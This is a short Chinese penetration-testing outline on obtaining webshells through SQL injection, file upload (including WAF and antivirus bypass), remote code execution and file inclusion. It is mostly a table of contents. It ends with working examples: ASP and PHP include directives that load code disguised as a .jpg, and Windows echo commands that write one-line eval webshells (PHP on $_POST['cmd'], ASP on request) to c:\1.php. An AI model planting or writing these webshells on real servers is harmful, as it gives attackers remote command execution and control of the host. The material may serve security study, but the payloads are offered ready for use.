文章目录
3.1 注入getshell
3.1.1 注入getshell方式
3.1.2 注意
3.1.3 举例
3.2 上传 getwebshell
3.2.1 上传 getwebshell方式
3.2.2 注意
3.2.3 上传过程可能遇到的问题
逻辑绕过:
WAF对抗:
杀软绕过:
执行层:
3.2.4 举例
上传插件:
修改允许上传类型:
3.3 RCE getshell
3.3.1 RCE getshell方式
3.3.2 注意
3.4 包含getwebshell
3.4.1 包含getwebshell 方式
3.4.2 注意
3.4.2 举例
asp 包含代码
<!--#include file="123.jpg"-->:#调用的文件必须和被调用文件在同一目录,如果不在同一目录,用下面的语句:<!--#include virtual="文件所在目录/123.jpg"-->
php包含:
<?Php include('123.jpg'); ?>
命令执行:
echo ^<^?php @eval($_POST['cmd']);?^>^ > c:\1.php
^<^%eval request("cracer")%^>^ > c:\1.php